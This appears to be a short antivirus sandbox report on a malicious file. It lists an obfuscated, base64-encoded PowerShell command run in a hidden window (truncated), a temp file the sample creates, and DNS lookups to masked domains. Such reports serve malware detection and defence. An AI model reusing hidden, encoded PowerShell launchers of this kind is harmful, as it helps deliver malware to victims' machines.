Technical Information
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABYAEIAQQBBAEcAXwBBACAAPQAgACcANgA1ADkAJwA7ACQAdgBrAEIAQQBBAGMAQQBEAD0AKAAiAHsAMAB9AHsAMgB9AHsAMQB9ACIAIAAtAGYAIAAnAGsAQQBBADQAYwAnACwAJwA0ADEAJwAsACcAUQAnACkAOwAkAEcAVQBVAG8AQQB4AFEAPQAkAG...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1560
Modifies file system
Creates the following files
- %TEMP%\1170787.cvr
Network activity
UDP
- DNS ASK ag###max.xyz
- DNS ASK tc####2000.com.br
- DNS ASK ou#####ndcreations.ca
- DNS ASK pe####nlarousse.ir
- DNS ASK xc###ive.store
Miscellaneous
Creates and executes the following
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABYAEIAQQBBAEcAXwBBACAAPQAgACcANgA1ADkAJwA7ACQAdgBrAEIAQQBBAGMAQQBEAD0AKAAiAHsAMAB9AHsAMgB9AHsAMQB9ACIAIAAtAGYAIAAnAGsAQQBBADQAYwAnACwAJwA0ADEAJwAsACcAUQAnACkAOwAkAEcAVQBVAG8AQQB4AFEAPQAkAG...' (with hidden window)
